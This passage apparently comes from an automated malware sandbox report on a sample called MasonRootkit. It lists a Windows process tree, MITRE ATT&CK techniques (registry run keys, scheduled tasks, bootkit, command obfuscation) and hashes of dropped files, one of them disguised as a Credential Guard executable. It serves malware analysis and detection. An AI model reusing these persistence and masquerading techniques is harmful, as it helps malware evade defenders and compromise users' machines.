                                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                          1⤵
                                                                                                                            PID:468
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                            1⤵
                                                                                                                              PID:2312
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                              1⤵
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:1616
                                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                              1⤵
                                                                                                                                PID:4340
                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:448
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                  1⤵
                                                                                                                                    PID:4632
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:2056
                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                      1⤵
                                                                                                                                        PID:4528
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:1352
                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:208
                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:2028
                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                              1⤵
                                                                                                                                                PID:3264
                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:4076
                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:2332
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3284
                                                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:1568
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4912
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4836
                                                                                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2132
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                          1⤵
                                                                                                                                                            PID:220
                                                                                                                                                          • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                            C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                            PID:5036
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5348
                                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                              1⤵
                                                                                                                                                                PID:7028
                                                                                                                                                              • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:6624
                                                                                                                                                                • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:6836

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                  Reconnaissance

                                                                                                                                                                  Resource Development

                                                                                                                                                                  Initial Access

                                                                                                                                                                  Execution

                                                                                                                                                                  Command and Scripting Interpreter

                                                                                                                                                                  1
                                                                                                                                                                  T1059

                                                                                                                                                                  PowerShell

                                                                                                                                                                  1
                                                                                                                                                                  T1059.001

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Scheduled Task

                                                                                                                                                                  1
                                                                                                                                                                  T1053.005

                                                                                                                                                                  Persistence

                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                  1
                                                                                                                                                                  T1547

                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                  1
                                                                                                                                                                  T1547.001

                                                                                                                                                                  Pre-OS Boot

                                                                                                                                                                  1
                                                                                                                                                                  T1542

                                                                                                                                                                  Bootkit

                                                                                                                                                                  1
                                                                                                                                                                  T1542.003

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Scheduled Task

                                                                                                                                                                  1
                                                                                                                                                                  T1053.005

                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                  1
                                                                                                                                                                  T1547

                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                  1
                                                                                                                                                                  T1547.001

                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                  1
                                                                                                                                                                  T1053

                                                                                                                                                                  Scheduled Task

                                                                                                                                                                  1
                                                                                                                                                                  T1053.005

                                                                                                                                                                  Defense Evasion

                                                                                                                                                                  Modify Registry

                                                                                                                                                                  2
                                                                                                                                                                  T1112

                                                                                                                                                                  Obfuscated Files or Information

                                                                                                                                                                  1
                                                                                                                                                                  T1027

                                                                                                                                                                  Command Obfuscation

                                                                                                                                                                  1
                                                                                                                                                                  T1027.010

                                                                                                                                                                  Pre-OS Boot

                                                                                                                                                                  1
                                                                                                                                                                  T1542

                                                                                                                                                                  Bootkit

                                                                                                                                                                  1
                                                                                                                                                                  T1542.003

                                                                                                                                                                  Credential Access

                                                                                                                                                                  Discovery

                                                                                                                                                                  Browser Information Discovery

                                                                                                                                                                  1
                                                                                                                                                                  T1217

                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                  1
                                                                                                                                                                  T1120

                                                                                                                                                                  Query Registry

                                                                                                                                                                  6
                                                                                                                                                                  T1012

                                                                                                                                                                  System Information Discovery

                                                                                                                                                                  6
                                                                                                                                                                  T1082

                                                                                                                                                                  System Location Discovery

                                                                                                                                                                  1
                                                                                                                                                                  T1614

                                                                                                                                                                  System Language Discovery

                                                                                                                                                                  1
                                                                                                                                                                  T1614.001

                                                                                                                                                                  Lateral Movement

                                                                                                                                                                  Collection

                                                                                                                                                                  Command and Control

                                                                                                                                                                  Web Service

                                                                                                                                                                  1
                                                                                                                                                                  T1102

                                                                                                                                                                  Exfiltration

                                                                                                                                                                  Impact

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\ProgramData\MasonRootkit.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    596KB

                                                                                                                                                                    MD5

                                                                                                                                                                    bb2fd6c1b233fd2f08a6a43ef860bcb6

                                                                                                                                                                    SHA1

                                                                                                                                                                    1cd9ea091bc0d7f907fcd8cf8c8b9d3187e6dc04

                                                                                                                                                                    SHA256

                                                                                                                                                                    8c4cddfb3723ecf013526733f93bd5f4408bc463c6a28ccb41b3fb63504ee9ce

                                                                                                                                                                    SHA512

                                                                                                                                                                    2ee649cf68e5121bd4ad3e51bdf0c71d773a8d0c67ce262356156b312221285bf62409ac2e2c5c5748adc31d3c94b24777f2918bdb9fcf488c61b0e2c6dc50b5

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BootstrapperNew.exe.log
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    dbdf5ba20066001c7c158cd1590ea142

                                                                                                                                                                    SHA1

                                                                                                                                                                    e494009c74e9ddca5078d2dbec5148d7e489f063

                                                                                                                                                                    SHA256

                                                                                                                                                                    a182e3e171bb26dbc3a07be1201b1fc202ff6cdc8206feb61063ebc2d215ffdb

                                                                                                                                                                    SHA512

                                                                                                                                                                    fefec6907fd3bdc1fd5c890de7275bbbe59de8da47110047e3c11fdf3d13ab0f18ab985d61a6f8c1e50e6922482ee2a2ffa63c1ff67b1b6e94da5588daa554b3

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Credential Guard & VBS Key Isolation.exe.log
                                                                                                                                                                    Filesize

                                                                                                                                                                    654B

                                                                                                                                                                    MD5

                                                                                                                                                                    2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                                    SHA1

                                                                                                                                                                    684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                                    SHA256

                                                                                                                                                                    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                                    SHA512

                                                                                                                                                                    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MasonRootkit.exe.log
                                                                                                                                                                    Filesize

                                                                                                                                                                    1KB

                                                                                                                                                                    MD5

                                                                                                                                                                    3982d6d16fd43ae609fd495bb33433a2

                                                                                                                                                                    SHA1

                                                                                                                                                                    6c33cd681fdfd9a844a3128602455a768e348765

                                                                                                                                                                    SHA256

                                                                                                                                                                    9a0a58776494250224706cbfbb08562eec3891fb988f17d66d0d8f9af4253cf9

                                                                                                                                                                    SHA512

                                                                                                                                                                    4b69315f5d139b8978123bebd417231b28f86b6c1433eb88105465a342339c6c6b8c240a2ca8d2a9c1fca20136c8c167b78a770ab0664231f6e1742291cbf1aa

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    968cb9309758126772781b83adb8a28f

                                                                                                                                                                    SHA1

                                                                                                                                                                    8da30e71accf186b2ba11da1797cf67f8f78b47c

                                                                                                                                                                    SHA256

                                                                                                                                                                    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                                                                                                                                                    SHA512

                                                                                                                                                                    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                    Filesize

                                                                                                                                                                    152B

                                                                                                                                                                    MD5

                                                                                                                                                                    4c9b7e612ef21ee665c70534d72524b0

                                                                                                                                                                    SHA1

                                                                                                                                                                    e76e22880ffa7d643933bf09544ceb23573d5add

                                                                                                                                                                    SHA256

                                                                                                                                                                    a64366387921aba157bba7472244791d5368aef8ecaf6472b616e1e130d7d05e

                                                                                                                                                                    SHA512

                                                                                                                                                                    e195e1ce5e7c06d193aa1f924d0079ea72b66eb22c3aea5b6811172251768f649368734e817996d9f0f72ddfd0e2bf2454aaee0bc650eaffd56fa125a334ae88

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                    Filesize

                                                                                                                                                                    152B

                                                                                                                                                                    MD5

                                                                                                                                                                    9f4a0b24e1ad3a25fc9435eb63195e60

                                                                                                                                                                    SHA1

                                                                                                                                                                    052b5a37605d7e0e27d8b47bf162a000850196cd

                                                                                                                                                                    SHA256

                                                                                                                                                                    7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb

                                                                                                                                                                    SHA512

                                                                                                                                                                    70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                                                                                                    Filesize

                                                                                                                                                                    144B

                                                                                                                                                                    MD5

                                                                                                                                                                    7e6675d63951183b638ba081781a7aeb

                                                                                                                                                                    SHA1

                                                                                                                                                                    ec565332a9182895baf25019316deb688fb886f8

                                                                                                                                                                    SHA256

                                                                                                                                                                    c07a1acda637fe1f2a3a6044c5c81f8dbd69d2cd34c7b4f24229a34a21d3a997

                                                                                                                                                                    SHA512

                                                                                                                                                                    33c8d56ab777162490da65a99c46f1fb61d1b2d952348aadbca49cc54edc67b6cab5a52fd21b441a84751459a76d9e09edb07cb2ff59a68a441f4c0e5b5a413e

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                                                                    Filesize

                                                                                                                                                                    399B

                                                                                                                                                                    MD5

                                                                                                                                                                    d30838c1fb27edd999f89880a1247ecc

                                                                                                                                                                    SHA1

                                                                                                                                                                    aa6fa7e48abe4f2b24722c0e564ac7f65c5d00da

                                                                                                                                                                    SHA256

                                                                                                                                                                    021e64627445e078484686401ac14192217350049ce02b65bf9273644749c33b

                                                                                                                                                                    SHA512

                                                                                                                                                                    0ec57b4dea0705a10fde0bd8a463e18594de6d89d850988428b2f47ad4c9e8fa8470dcae3237dddfd7d39966ece5fb8c816db49912e539c8d7c05d8e43f1bc06

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                    Filesize

                                                                                                                                                                    5KB

                                                                                                                                                                    MD5

                                                                                                                                                                    04b28285ff1888067c1f90200c00b9a8

                                                                                                                                                                    SHA1

                                                                                                                                                                    6cb139148326799d706da2b25fd19a55e2fdf084

                                                                                                                                                                    SHA256

                                                                                                                                                                    5528ba17d9fed140133dbbe5f6eea01eeb3edc03c34cb437280a155f0c03e85e

                                                                                                                                                                    SHA512

                                                                                                                                                                    076a5c74e66d1f92e2735f05439977d35954866e59441654c55274016c22e757c64be273b311a742d09f4f1c09ad548e54be8cc885176a1bd4bee21c60c87139

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                    Filesize

                                                                                                                                                                    6KB

                                                                                                                                                                    MD5

                                                                                                                                                                    4214f107bfad02f7b2442d505659e3ce

                                                                                                                                                                    SHA1

                                                                                                                                                                    abd0849179c9752526ddcded9d2dec08bbda2a8e

                                                                                                                                                                    SHA256

                                                                                                                                                                    7a32e731d59e19940275879c78e936e68d4115cc5c25f3b3ab06b9c425aab69d

                                                                                                                                                                    SHA512

                                                                                                                                                                    5814f80c3ae6329e13675ae2c8fa550b8abe0f8b7e8776011912aed7ff06ba27d3a20a583edb6957c8b046b638f86d342d4e163b95d0e27ad85f52ae3be7664d

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                    Filesize

                                                                                                                                                                    6KB

                                                                                                                                                                    MD5

                                                                                                                                                                    87335d41e20304647901d4b960480c28

                                                                                                                                                                    SHA1

                                                                                                                                                                    b374b5cb9e113caeecfd6d56ca480eeabee8ecd9

                                                                                                                                                                    SHA256

                                                                                                                                                                    ff7c23efa10000f888b66c8130a037165c5480e40e5f218bb186a4cd7564c203

                                                                                                                                                                    SHA512

                                                                                                                                                                    65ae32d7983278cf9f4e578db5734e85a4d264fdb321fa4bcd5a4326b8571c38cfd1f1a87bc59fd819ce60b000693126ab955a0258405404d89d0fb292cf0833

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                                                                                                                    Filesize

                                                                                                                                                                    16B

                                                                                                                                                                    MD5

                                                                                                                                                                    6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                    SHA1

                                                                                                                                                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                    SHA256

                                                                                                                                                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                    SHA512

                                                                                                                                                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                    Filesize

                                                                                                                                                                    11KB

                                                                                                                                                                    MD5

                                                                                                                                                                    2be16ca527c5972fae3b5579000c6f48

                                                                                                                                                                    SHA1

                                                                                                                                                                    122a35ea9975449346f73a29dabc4cc4b7e13a3c

                                                                                                                                                                    SHA256

                                                                                                                                                                    853fa594151bbdb4042ecf2361ae548b6319e1623297c10062f9a57b3dd352f3

                                                                                                                                                                    SHA512

                                                                                                                                                                    a850b67ba939fe27929a8b48e6c4822d7fa8b4eea121ddb6559ac46fc72eb88dd053fc2bde158033bdb2d82a9f57a7c51fe018d9bc6f447b339890d524414113

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                    Filesize

                                                                                                                                                                    11KB

                                                                                                                                                                    MD5

                                                                                                                                                                    cb84c7ca083a988703292837b92a5e7c

                                                                                                                                                                    SHA1

                                                                                                                                                                    d2fe2bdfc8a862878068308d27c951418ef93fe8

                                                                                                                                                                    SHA256

                                                                                                                                                                    6436098bfea66705ab1ebfcfe760e6cdec0ae5f965b0451d07aae6ac919113ff

                                                                                                                                                                    SHA512

                                                                                                                                                                    0062712dfc9f91add06dd921606169173d925887778f9e92e2a23ca37be97c4961f4b97384a17749f463d996a2a53b9224c54aca48f6ac401166a4f33f9ad15c

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                    Filesize

                                                                                                                                                                    18KB

                                                                                                                                                                    MD5

                                                                                                                                                                    2b3e1967765f5c09c90aaacd16d58006

                                                                                                                                                                    SHA1

                                                                                                                                                                    d71f1cf84fb072a4ee278aa88dd196ff88db69cf

                                                                                                                                                                    SHA256

                                                                                                                                                                    86adf07377c2b5695dd042781891c14b98265c77ec490fa9b4a496ca734ece15

                                                                                                                                                                    SHA512

                                                                                                                                                                    45fc0cfda0986cbb4c61e292d90ba3e6fde81fc4c8b95a41f1f2df97f66c47fe5b5ceed354685989d86e86751fc5dc08d901f925c648795c5ea4f7c4d51fbd78

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                    Filesize

                                                                                                                                                                    1KB

                                                                                                                                                                    MD5

                                                                                                                                                                    74141c80b6e12a16cc5620d767d4f2b6

                                                                                                                                                                    SHA1

                                                                                                                                                                    ce58c94d9b9b74524a6d7941a77503b2f3cfb7d4

                                                                                                                                                                    SHA256

                                                                                                                                                                    5abee7ef10366deb43831496115b59c4979c71125b9868dc63129da2c93ce774

                                                                                                                                                                    SHA512

                                                                                                                                                                    7d9b1fae61fe8a369f582c9340036226273a8de7e508b67b4a3e4e3f02d613fd2e2dcd44cba1d67b34b4e29ce9c1ae2145a69e8f0eb10515c9084a1391a11c28

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    f227cdfd423b3cc03bb69c49babf4da3

                                                                                                                                                                    SHA1

                                                                                                                                                                    3db5a97d9b0f2545e7ba97026af6c28512200441

                                                                                                                                                                    SHA256

                                                                                                                                                                    cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

                                                                                                                                                                    SHA512

                                                                                                                                                                    b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    612KB

                                                                                                                                                                    MD5

                                                                                                                                                                    5e1eb1a67d40ccae40dee2a037ca6c64

                                                                                                                                                                    SHA1

                                                                                                                                                                    786b54d3d451ea40faeeb20fd30a38744862eeb5

                                                                                                                                                                    SHA256

                                                                                                                                                                    80e5cb11ae2512da3b7be501b469d6fc1a69a2017a143b9897023da9e366325f

                                                                                                                                                                    SHA512

                                                                                                                                                                    0484da209f0c8edff5d1f08b841f3134008ff72fb563fa48a15f96c8ad23fdfb82cc8a59bc729f2db3d359e18558d6f4fbaf4b40955a38787472db438a043205

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Pendulum.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    219KB

                                                                                                                                                                    MD5

                                                                                                                                                                    25c10f0ddf7f592df6b8f8b4564d340f

                                                                                                                                                                    SHA1

                                                                                                                                                                    d438750f1420857237546b943b63a4b39b8ccefb

                                                                                                                                                                    SHA256

                                                                                                                                                                    5510587a96e59199167ed1ac5d7e53f22d0f702c01958e67f332e6a6685d8138

                                                                                                                                                                    SHA512

                                                                                                                                                                    b4bbc94a71853f1a9c4126a15ce35797e003028c7d0dde0fff82d0a8ab09c2949b29c8bacfe8962f009c5b2ef16f9de4e532098f1eec7e0cb7e3665a7e4aafd6

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nx1on5fr.vxg.ps1
                                                                                                                                                                    Filesize

                                                                                                                                                                    60B

                                                                                                                                                                    MD5

                                                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                    SHA1

                                                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                    SHA256

                                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                    SHA512

                                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpEE0.tmp.bat
                                                                                                                                                                    Filesize

                                                                                                                                                                    163B

                                                                                                                                                                    MD5

                                                                                                                                                                    8286c2fb211ae1c5bde8147d0dd5a6d5

                                                                                                                                                                    SHA1

                                                                                                                                                                    ae5a35d720b3b9679f15c0615340638dc1e7bb86

                                                                                                                                                                    SHA256

                                                                                                                                                                    ae59c9034833d17abffaab332489edb536d9876ad0e4e731ceafbdf2a8598b39

                                                                                                                                                                    SHA512

                                                                                                                                                                    a8767dbe1e77ca381e45bfc20b31bd1ece5f4caa4bb5a6616ebb0d1ef8c5640081fad530c7b66f247289c6f252aea4f4ae4d9faa5c5fe6c5f0e606a488587ea5

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\Downloads\CONFIG
                                                                                                                                                                    Filesize

                                                                                                                                                                    79B

                                                                                                                                                                    MD5

                                                                                                                                                                    0284fa0391784125ad3b12be8c92c6ae

                                                                                                                                                                    SHA1

                                                                                                                                                                    e4fe938288c6804d9c79947ad2e39939a595e9f3

                                                                                                                                                                    SHA256

                                                                                                                                                                    789075b8c810f2b63f86dd1f8b7be836178ac679a32f2cb2376e013bc78c68c0

                                                                                                                                                                    SHA512

                                                                                                                                                                    9dd8db4e0017ae906e7c4178a54ea16f03aaba4c17658ed96fc384d2cd51f44c6e514872ba5c7e5f43131eb4d25c063531291d70dfab4422260585742a37e235

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Users\Admin\Downloads\Unconfirmed 107525.crdownload
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    afc3d1344bdaf253fbfa774c1bbace0a

                                                                                                                                                                    SHA1

                                                                                                                                                                    adf47d0df0c94564c559da98500e7e19165a9cea

                                                                                                                                                                    SHA256

                                                                                                                                                                    a84273c5deb772a3c6d1e32e2c017136d734f82c160c6554eb0d7fed8203eb0c

                                                                                                                                                                    SHA512

                                                                                                                                                                    623839618cbb3f06b06b920bee1908a005cba8432b1c04170397a7ab959fd038c8221c82d3e972dfaacaf791ddcb9384fc49a95d8f52fa90f4f778ba188d2064

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • C:\Windows\Credential Guard & VBS Key Isolation.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    55KB

                                                                                                                                                                    MD5

                                                                                                                                                                    dac20ddb2cfb3cb89ce5bcd907c796df

                                                                                                                                                                    SHA1

                                                                                                                                                                    84ec40d9a683ed62a25f8e1e570b0a2ee3987af0

                                                                                                                                                                    SHA256

                                                                                                                                                                    9a727d5cfc4c67cb0d3c0f8195087042fd04b83bb29cbe0c0439a4094a2adfc7

                                                                                                                                                                    SHA512

                                                                                                                                                                    5a3199f76bc18eb20a1e9e7d0bdbadbff3deaa06ec00b3aee33360f1497cc22ae0bc1a125aeaadcef1647c5f03cb386bfbc62375ca5e70ac57c01168043c8762

                                                                                                                                                                    Download Submit

                                                                                                                                                                  • memory/384-304-0x000002B6A06E0000-0x000002B6A089B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.7MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/384-299-0x000002B6A06E0000-0x000002B6A089B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.7MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/384-300-0x000002B6A06E0000-0x000002B6A089B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.7MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/384-302-0x000002B6A06E0000-0x000002B6A089B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.7MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/384-307-0x00007FFD6DB70000-0x00007FFD6DB80000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/384-306-0x000002B6A06E0000-0x000002B6A089B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.7MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/516-316-0x0000017514480000-0x000001751463B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.7MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/516-318-0x0000017514480000-0x000001751463B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.7MB

                                                                                                                                                                    Download

                                                                                                                                                                  • memory/516-314-0x0000017514480000-0x000001751463B000-memory.dmp

                                                                                                                                                                    Filesize

